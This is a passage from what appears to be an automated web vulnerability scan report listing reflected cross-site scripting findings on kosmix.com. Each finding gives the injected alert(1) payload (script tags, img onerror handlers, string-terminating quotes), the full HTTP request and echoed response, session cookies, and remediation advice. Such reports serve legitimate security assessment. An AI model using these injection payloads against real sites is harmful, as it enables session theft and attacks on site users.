Cookie: __utmz=111610369.1305489666.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=111610369.1610363998.1305489666.1305489666.1305489666.1; __utmc=111610369; __utmb=111610369.1.10.1305489666; is_returning=1; version=2; _genome_session=BAh7CEkiD3Nlc3Npb25faWQGOgZFRiIlY2E2ZTNmNDFiNzJiODFhMzY1Yjg5NDcwNmE4YmI5YTJJIhRhYmluZ29faWRlbnRpdHkGOwBGbCsHmf6se0kiEF9jc3JmX3Rva2VuBjsARkkiMVNYY2pvSEVCQnNEVHhLTS9EN3ptcVdMN0hNUUp2RGVCUXBTTmRLbVVOZ1k9BjsARg%3D%3D--65608cc915d0028ef5c7ed0070394e6790f362d5; NSC_uc2.uxffucfbu.dpn=ffffffff0904168a45525d5f4f58455e445a4a422e50; _chartbeat2=t5cmaxi3cat2wqxj

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:10:10 GMT
Status: 200 OK
Content-Type: text/html; charset=utf-8
ETag: "bab152486e5ccca7dc267ac0e34d24a1"
Cache-Control: max-age=0, private, must-revalidate
X-UA-Compatible: IE=Edge,chrome=1
X-Runtime: 0.103756
Set-Cookie: version=2; path=/; expires=Thu, 15-May-2031 20:10:10 GMT
Set-Cookie: _genome_session=BAh7CEkiD3Nlc3Npb25faWQGOgZFRiIlY2E2ZTNmNDFiNzJiODFhMzY1Yjg5NDcwNmE4YmI5YTJJIhRhYmluZ29faWRlbnRpdHkGOwBGbCsHmf6se0kiEF9jc3JmX3Rva2VuBjsARkkiMVNYY2pvSEVCQnNEVHhLTS9EN3ptcVdMN0hNUUp2RGVCUXBTTmRLbVVOZ1k9BjsARg%3D%3D--65608cc915d0028ef5c7ed0070394e6790f362d5; path=/; HttpOnly
Vary: Accept-Encoding
Set-Cookie: NSC_uc2.uxffucfbu.dpn=ffffffff0904168a45525d5f4f58455e445a4a422e50;expires=Sun, 15-May-2011 20:12:10 GMT;path=/
Content-Length: 32408

<!DOCTYPE html>
<html>
<head>
<meta http-equiv="content-type" content="text/html;charset=UTF-8" />
<title>Detroit Lions @ Green Bay Packers (Week 4) - Live tweets </title>

<meta name="description"
...[SNIP]...
<div data-portlet-uid='79ae7' style=x:expression(alert(1)) e9cde0e431c' >
...[SNIP]...

4.14. http://www.kosmix.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kosmix.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bb009"%3balert(1)//7588aa95cd8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bb009";alert(1)//7588aa95cd8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?bb009"%3balert(1)//7588aa95cd8=1 HTTP/1.1
Host: www.kosmix.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:00:48 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: kid=f3875af0-615b-012e-f057-003048fe4cb2; path=/; expires=Sat, 15-May-2021 20:00:48 GMT
Set-Cookie: as=ref_absent; path=/; expires=Sat, 15-May-2021 20:00:48 GMT
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:00:48 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_uc.lptnjy.dpn=ffffffff090417b745525d5f4f58455e445a4a423990;expires=Sun, 15-May-2011 20:02:48 GMT;path=/
Content-Length: 15733

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...

   
//set global search variables
   var searchParams = {};
   var stickyParams = {};
       searchParams["dynamic_modules"] = "";
       searchParams["v"] = "any";
       searchParams["qtitle"] = "";
       searchParams["bb009";alert(1)//7588aa95cd8"] = "1";
       searchParams["invasive_banner_ad"] = "";
       searchParams["urchin_id"] = "UA-2165955-1";
       searchParams["referrer_query"] = "";
       searchParams["q_lower"] = "kosmixhomepage";
       searchParams["a
...[SNIP]...

4.15. http://www.kosmix.com/c-javascripts/kapp_relevance.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.kosmix.com
Path:   /c-javascripts/kapp_relevance.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4c039\"%3b858e9844ad6 was submitted in the REST URL parameter 2. This input was echoed as 4c039\\";858e9844ad6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /c-javascripts/kapp_relevance.js4c039\"%3b858e9844ad6?1302816008 HTTP/1.1
Host: www.kosmix.com
Proxy-Connection: keep-alive
Referer: http://www.kosmix.com/
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1290282890-1305489649089; __utmz=33745467.1305489787.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; __utma=33745467.1661155596.1305489647.1305489647.1305489787.2; __utmc=33745467; __utmb=33745467.1.10.1305489787; kid=320636d0-615c-012e-b1f7-003048fe3090; as=ref_absent; last_referrer=http%3A//burp/show/6; NSC_uc.lptnjy.dpn=ffffffff090417b345525d5f4f58455e445a4a423990

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:13:20 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: iq=c-javascripts; path=/
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:13:20 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_uc.lptnjy.dpn=ffffffff090417b345525d5f4f58455e445a4a423990;expires=Sun, 15-May-2011 20:15:20 GMT;path=/
Content-Length: 16424

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...
ext/javascript">
   var kl = kapp.log;
   window.document.kl = kl;
   kl.session_name = "kid";
   kl.session_id = "320636d0-615c-012e-b1f7-003048fe3090";
   kl.svid = "2005489664";
   kl.query = "Kapp+Relevance.js4c039\\";858e9844ad6";
   kl.source = kapp.traffic.source();
   kl.subsource = kapp.traffic.subSource();
   kl.coordinate_anchor_id = "header";
   kl.http_referrer = "http://www.kosmix.com/";
   kl.build_id = '152138';
   kl.release_
...[SNIP]...

4.16. http://www.kosmix.com/images/ck.txt [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.kosmix.com
Path:   /images/ck.txt

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 72e65\"%3b8b72835fc4c was submitted in the REST URL parameter 2. This input was echoed as 72e65\\";8b72835fc4c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /images/ck.txt72e65\"%3b8b72835fc4c?pvid=454012985&s=f062f6f0-615b-012e-931e-003048fe4cb2&ckid=1086031566&m=footer&r=1010200&c=1&ct=staticclick&x=806&y=923&v=29&p=site_footer HTTP/1.1
Host: www.kosmix.com
Proxy-Connection: keep-alive
Referer: http://www.kosmix.com/
X-Prototype-Version: 1.6.1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kid=f062f6f0-615b-012e-931e-003048fe4cb2; as=ref_absent; last_referrer=; __utmz=33745467.1305489647.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=33745467.1661155596.1305489647.1305489647.1305489647.1; __utmc=33745467; __utmb=33745467.1.10.1305489647; __qca=P0-1290282890-1305489649089; NSC_uc.lptnjy.dpn=ffffffff090417b745525d5f4f58455e445a4a423990

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:15:26 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: iq=images; path=/
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:15:26 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_uc.lptnjy.dpn=ffffffff090417b745525d5f4f58455e445a4a423990;expires=Sun, 15-May-2011 20:17:26 GMT;path=/
Content-Length: 16645

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...
ipt type="text/javascript">
   var kl = kapp.log;
   window.document.kl = kl;
   kl.session_name = "kid";
   kl.session_id = "f062f6f0-615b-012e-931e-003048fe4cb2";
   kl.svid = "1295763866";
   kl.query = "Ck.txt72e65\\";8b72835fc4c";
   kl.source = kapp.traffic.source();
   kl.subsource = kapp.traffic.subSource();
   kl.coordinate_anchor_id = "header";
   kl.http_referrer = "http://www.kosmix.com/";
   kl.build_id = '152138';
   kl.release_
...[SNIP]...

4.17. http://www.kosmix.com/images/favicon.ico [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.kosmix.com
Path:   /images/favicon.ico

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload de377\"%3bddcfd3a24de was submitted in the REST URL parameter 2. This input was echoed as de377\\";ddcfd3a24de in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /images/favicon.icode377\"%3bddcfd3a24de HTTP/1.1
Host: www.kosmix.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kid=f062f6f0-615b-012e-931e-003048fe4cb2; as=ref_absent; last_referrer=; __utmz=33745467.1305489647.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=33745467.1661155596.1305489647.1305489647.1305489647.1; __utmc=33745467; __utmb=33745467.1.10.1305489647; __qca=P0-1290282890-1305489649089; NSC_uc.lptnjy.dpn=ffffffff090417b745525d5f4f58455e445a4a423990

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:07:55 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: iq=images; path=/
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:07:55 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_uc.lptnjy.dpn=ffffffff090417b745525d5f4f58455e445a4a423990;expires=Sun, 15-May-2011 20:09:55 GMT;path=/
Content-Length: 16189

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...
ype="text/javascript">
   var kl = kapp.log;
   window.document.kl = kl;
   kl.session_name = "kid";
   kl.session_id = "f062f6f0-615b-012e-931e-003048fe4cb2";
   kl.svid = "1005347074";
   kl.query = "Favicon.icode377\\";ddcfd3a24de";
   kl.source = kapp.traffic.source();
   kl.subsource = kapp.traffic.subSource();
   kl.coordinate_anchor_id = "header";
   kl.http_referrer = "";
   kl.build_id = '152138';
   kl.release_id = 'GAMMA.REL.BLD.20
...[SNIP]...

4.18. http://www.kosmix.com/images/pv.txt [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kosmix.com
Path:   /images/pv.txt

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 369b1"><script>alert(1)</script>373ea074d73 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images369b1"><script>alert(1)</script>373ea074d73/pv.txt?pvid=454012985&s=f062f6f0-615b-012e-931e-003048fe4cb2&sv=1220494746&q=&sr=organic&br=Chrome&os=Windows&ur=http%3A//www.kosmix.com/&rf=&sw=1920&sh=1200&vw=1136&vh=945&v=29&rs=May+15+13%3A00%3A43.165997&bid=152138&rid=GAMMA.REL.BLD.20110412 HTTP/1.1
Host: www.kosmix.com
Proxy-Connection: keep-alive
Referer: http://www.kosmix.com/
X-Prototype-Version: 1.6.1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kid=f062f6f0-615b-012e-931e-003048fe4cb2; as=ref_absent; NSC_uc.lptnjy.dpn=ffffffff090417b745525d5f4f58455e445a4a423990; last_referrer=

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:14:47 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: iq=images369b1%22%3E%3Cscript%3Ealert%281%29%3C; path=/
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:14:47 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_uc.lptnjy.dpn=ffffffff090417b745525d5f4f58455e445a4a423990;expires=Sun, 15-May-2011 20:16:47 GMT;path=/
Content-Length: 16872

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...
<link rel="canonical" href="http://www.kosmix.com/images369b1"><script>alert(1)</script>373ea074d73/pv.txt"/>
...[SNIP]...

4.19. http://www.kosmix.com/javascripts/cache/options_bottom-kosmix-sem-chimborazo-152138.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.kosmix.com
Path:   /javascripts/cache/options_bottom-kosmix-sem-chimborazo-152138.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b8e1a\"%3b7b368945773 was submitted in the REST URL parameter 2. This input was echoed as b8e1a\\";7b368945773 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /javascripts/b8e1a\"%3b7b368945773/options_bottom-kosmix-sem-chimborazo-152138.js?1302902896 HTTP/1.1
Host: www.kosmix.com
Proxy-Connection: keep-alive
Referer: http://www.kosmix.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kid=f062f6f0-615b-012e-931e-003048fe4cb2; as=ref_absent; NSC_uc.lptnjy.dpn=ffffffff090417b745525d5f4f58455e445a4a423990; last_referrer=

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:05:22 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: iq=javascripts; path=/
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:05:22 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_uc.lptnjy.dpn=ffffffff090417b745525d5f4f58455e445a4a423990;expires=Sun, 15-May-2011 20:07:22 GMT;path=/
Content-Length: 16512

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...
<script type="text/javascript">
   var kl = kapp.log;
   window.document.kl = kl;
   kl.session_name = "kid";
   kl.session_id = "f062f6f0-615b-012e-931e-003048fe4cb2";
   kl.svid = "1497877667";
   kl.query = "B8e1a\\";7b368945773";
   kl.source = kapp.traffic.source();
   kl.subsource = kapp.traffic.subSource();
   kl.coordinate_anchor_id = "header";
   kl.http_referrer = "http://www.kosmix.com/";
   kl.build_id = '152138';
   kl.release_
...[SNIP]...

4.20. http://www.kosmix.com/javascripts/cache/options_bottom-kosmix-sem-chimborazo-152138.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kosmix.com
Path:   /javascripts/cache/options_bottom-kosmix-sem-chimborazo-152138.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cb94e"><img%20src%3da%20onerror%3dalert(1)>2ad41685b89 was submitted in the REST URL parameter 2. This input was echoed as cb94e"><img src=a onerror=alert(1)>2ad41685b89 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /javascripts/cb94e"><img%20src%3da%20onerror%3dalert(1)>2ad41685b89/options_bottom-kosmix-sem-chimborazo-152138.js?1302902896 HTTP/1.1
Host: www.kosmix.com
Proxy-Connection: keep-alive
Referer: http://www.kosmix.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kid=f062f6f0-615b-012e-931e-003048fe4cb2; as=ref_absent; NSC_uc.lptnjy.dpn=ffffffff090417b745525d5f4f58455e445a4a423990; last_referrer=

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:05:18 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: iq=javascripts; path=/
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:05:18 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_uc.lptnjy.dpn=ffffffff090417b745525d5f4f58455e445a4a423990;expires=Sun, 15-May-2011 20:07:18 GMT;path=/
Content-Length: 16727

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...
<meta name="title" content="Cb94e"><img Src=a Onerror=alert(1)>2ad41685b89 - options_bottom kosmix sem chimborazo 152138.js" />
...[SNIP]...

4.21. http://www.kosmix.com/javascripts/cache/topic_bottom-kosmix-sem-chimborazo-152138.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kosmix.com
Path:   /javascripts/cache/topic_bottom-kosmix-sem-chimborazo-152138.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c70d0"><script>alert(1)</script>0392b55a33 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /javascriptsc70d0"><script>alert(1)</script>0392b55a33/cache/topic_bottom-kosmix-sem-chimborazo-152138.js?1303752733 HTTP/1.1
Host: www.kosmix.com
Proxy-Connection: keep-alive
Referer: http://www.kosmix.com/
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1290282890-1305489649089; __utmz=33745467.1305489787.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; __utma=33745467.1661155596.1305489647.1305489647.1305489787.2; __utmc=33745467; __utmb=33745467.1.10.1305489787; kid=320636d0-615c-012e-b1f7-003048fe3090; as=ref_absent; last_referrer=http%3A//burp/show/6; NSC_uc.lptnjy.dpn=ffffffff090417b345525d5f4f58455e445a4a423990

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:14:19 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: iq=javascriptsc70d0%22%3E%3Cscript%3Ealert%281%29%3C; path=/
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:14:19 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_uc.lptnjy.dpn=ffffffff090417b345525d5f4f58455e445a4a423990;expires=Sun, 15-May-2011 20:16:19 GMT;path=/
Content-Length: 16422

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...
<link rel="canonical" href="http://www.kosmix.com/javascriptsc70d0"><script>alert(1)</script>0392b55a33/cache/topic_bottom-kosmix-sem-chimborazo-152138.js"/>
...[SNIP]...

4.22. http://www.kosmix.com/javascripts/cache/topic_bottom-kosmix-sem-chimborazo-152138.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.kosmix.com
Path:   /javascripts/cache/topic_bottom-kosmix-sem-chimborazo-152138.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5b0dd\"%3b33f6859b5d was submitted in the REST URL parameter 2. This input was echoed as 5b0dd\\";33f6859b5d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /javascripts/5b0dd\"%3b33f6859b5d/topic_bottom-kosmix-sem-chimborazo-152138.js?1304862030 HTTP/1.1
Host: www.kosmix.com
Proxy-Connection: keep-alive
Referer: http://www.kosmix.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kid=f062f6f0-615b-012e-931e-003048fe4cb2; as=ref_absent; NSC_uc.lptnjy.dpn=ffffffff090417b745525d5f4f58455e445a4a423990; last_referrer=

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:06:06 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: iq=javascripts; path=/
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:06:06 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_uc.lptnjy.dpn=ffffffff090417b745525d5f4f58455e445a4a423990;expires=Sun, 15-May-2011 20:08:06 GMT;path=/
Content-Length: 16492

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...
<script type="text/javascript">
   var kl = kapp.log;
   window.document.kl = kl;
   kl.session_name = "kid";
   kl.session_id = "f062f6f0-615b-012e-931e-003048fe4cb2";
   kl.svid = "895175937";
   kl.query = "5b0dd\\";33f6859b5d";
   kl.source = kapp.traffic.source();
   kl.subsource = kapp.traffic.subSource();
   kl.coordinate_anchor_id = "header";
   kl.http_referrer = "http://www.kosmix.com/";
   kl.build_id = '152138';
   kl.release_
...[SNIP]...

4.23. http://www.kosmix.com/javascripts/cache/topic_bottom-kosmix-sem-chimborazo-152138.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kosmix.com
Path:   /javascripts/cache/topic_bottom-kosmix-sem-chimborazo-152138.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84c71"><img%20src%3da%20onerror%3dalert(1)>15a60d74c0c was submitted in the REST URL parameter 2. This input was echoed as 84c71"><img src=a onerror=alert(1)>15a60d74c0c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

